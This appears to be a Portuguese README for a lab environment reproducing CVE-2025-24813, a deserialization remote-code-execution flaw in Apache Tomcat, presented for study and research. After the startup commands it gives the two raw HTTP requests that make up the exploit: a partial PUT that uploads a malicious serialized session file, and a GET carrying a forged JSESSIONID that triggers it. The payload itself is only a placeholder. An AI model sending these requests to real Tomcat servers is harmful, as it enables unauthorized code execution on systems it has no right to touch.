
tomcat CVE-2025-24813 ambiente de RCE por desserialização
Este repositório é um ambiente de reprodução do CVE-2025-24813, o RCE mais recente do Tomcat.
Apenas para fins de estudo e pesquisa!
As condições acima necessárias para a reprodução já estão habilitadas neste ambiente
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
Acesse: http://127.0.0.1:9001/
Gere um arquivo serializado malicioso e faça o upload usando o seguinte pacote. Observe que o valor do chunk no Range deve ser consistente com o Length e maior que o tamanho atual do arquivo.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{反序列化文件内容)}}
Acione a exploração usando o seguinte POC:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx
Referência: https://forum.butian.net/article/674